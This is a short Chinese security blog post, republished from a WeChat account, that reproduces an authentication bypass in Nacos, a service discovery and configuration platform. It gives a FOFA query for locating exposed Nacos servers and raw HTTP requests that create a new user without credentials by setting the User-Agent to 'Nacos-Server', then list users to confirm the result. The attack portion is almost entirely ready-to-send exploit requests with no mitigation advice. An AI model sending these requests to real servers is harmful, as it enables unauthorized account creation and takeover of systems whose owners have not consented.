Nacos 认证绕过

admin 2021年5月12日01:15:54评论289 views字数 829阅读2分45秒阅读模式

Nacos 认证绕过


FOFA:title=nacos

一、漏洞概述

一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

二、漏洞复现

2.1添加用户

POST /nacos/v1/auth/users?username=aaaa&password=bbbb HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Nacos 认证绕过

2.2添加成功

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Nacos 认证绕过

2.3登录测试

Nacos 认证绕过参考:

https://github.com/alibaba/nacos/issues/4593
https://www.t00ls.net/articles-59364.html

- END -


本文始发于微信公众号(Admin Team):Nacos 认证绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月12日01:15:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos 认证绕过https://cn-sec.com/archives/260065.html

发表评论

匿名网友 填写信息